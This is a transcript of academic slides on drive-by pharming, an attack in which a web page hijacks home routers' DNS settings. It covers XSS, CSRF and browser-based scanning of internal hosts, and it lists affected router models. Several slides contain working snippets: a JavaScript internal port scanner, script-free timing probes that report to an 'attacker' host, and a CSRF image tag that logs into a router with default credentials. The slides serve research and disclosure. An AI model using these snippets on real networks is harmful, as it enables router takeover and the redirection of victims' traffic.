Drive-By Pharming - Sid Stamm
research.sidstamm.com/papers/driveby-pharming-icics-slides.pdf

Drive-By Pharming
Sid Stamm :: Indiana University
Zulfikar Ramzan :: Symantec Corporation
Markus Jakobsson :: Indiana University

Post on 14-Jul-2020

13 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Drive-By Pharming

Sid Stamm :: Indiana University
Zulfikar Ramzan :: Symantec Corporation
Markus Jakobsson :: Indiana University

Page 2:

Phishing

Page 3:

Phishing


Page 4:

Phishing

Page 5:

Crimeware

More Info: http://www.apwg.org

Page 6:

Pharming

Page 7:

Browser Problems

Page 8:

Browser History Snooping

http://browser-recon.info

Page 9:

Browser History Snooping

http://browser-recon.info

Page 10:

XSS

Page 11:

CSRF

http://sidstamm.com/netflixcsrf.html

Page 12:

Host Scanning

Attacking from Victim's Browser

[Diagram: evil code probing internal hosts from the victim's browser: x x x x !]

Page 13:

Host Scanning

// A script tag whose src fails to load raises a window.onerror with
// "Error loading script"; any other error message means something answered.
window.onerror = function(msg, url) {
  if (!msg.match(/Error loading script/)) {
    serverIsLive(url);
  }
};

// Point a script tag at every address in the 192.168.0.0/24 range.
for (var i = 0; i < 255; i++) {
  var s = document.createElement("script");
  s.src = "http://192.168.0." + i;
  document.body.appendChild(s);
}

http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html

Page 14:

Script-Free Scanning

<img src="http://attacker/record-time/?id=a" />
<link rel="stylesheet" type="text/css" href="http://192.168.0.1/" />
<img src="http://attacker/record-time/?id=b" />
<link rel="stylesheet" type="text/css" href="http://192.168.0.2/" />
<img src="http://attacker/record-time/?id=c" />

...

http://jeremiahgrossman.blogspot.com/2006/11/browser-port-scanning-without.html

Page 15:

Router Woes

• GET v. POST

• admin:admin

• partial submit

• predictability

Page 16:

Drive-By Pharming

[Diagram: ISP clouds, Attacker's DNS + Web Server, ISP's DNS Server, ISP's Gateway, Victim, Router's Internal Net]

Page 17:

Normal DNS Lookup

[Diagram: ISP clouds, Attacker's DNS + Web Server, ISP's DNS Server, ISP's Gateway, Victim, Router's Internal Net]

Page 18:

Normal DNS Lookup

[Diagram: same network layout; the victim sends LOOKUP evil.com to the ISP's DNS Server]

Page 19:

Normal DNS Lookup

[Diagram: same network layout; LOOKUP evil.com is answered with Evil.com=1.1.1.1]

Page 20:

Drive-By Attack

[Diagram: ISP clouds, Attacker's DNS + Web Server, ISP's DNS Server, ISP's Gateway, Victim, Router's Internal Net]

Page 21:

Drive-By Attack

[Diagram: same network layout; the victim sends GET 1.1.1.1 to the Attacker's DNS + Web Server]

Page 22:

Pharmed DNS Lookup

[Diagram: ISP clouds, Attacker's DNS + Web Server, ISP's DNS Server, ISP's Gateway, Victim, Router's Internal Net]

Page 23:

Pharmed DNS Lookup

[Diagram: same network layout; the victim's LOOKUP now goes to the Attacker's DNS + Web Server instead of the ISP's DNS Server]

Page 24:

How This Happens

POST -> GET

( PRE-ARRANGED )

Page 25:

How This Happens

<img src="http://admin:@192.168.0.1/cfg.cgi?...">

( CSRF )

Page 27:

Fallout

Netgear WGR614
D-Link DI-524
Linksys WRT54G

Page 28:

http://www.cisco.com/warp/public/707/cisco-sr-20070215-http.shtml

Cisco 806 Cisco 826 Cisco 827

Cisco 827H Cisco 827-4v

Cisco 828 Cisco 831 Cisco 836 Cisco 837

Cisco SOHO 71 Cisco SOHO 76 Cisco SOHO 77

Cisco SOHO 77H Cisco SOHO 78 Cisco SOHO 91 Cisco SOHO 96 Cisco SOHO 97

...

Fallout

Netgear WGR614
D-Link DI-524
Linksys WRT54G

Page 29:

Router Zombie Networks?

Page 30:

Router Zombie Networks?

Page 31:

Viral Spread

...

Page 32:

Viral Spread

...

Page 33:

Countermeasures

Page 34:

Countermeasures

Page 35:

Countermeasures

Page 36:

Countermeasures

Page 37:

Countermeasures

ISP

Page 38:

Drive-By Pharming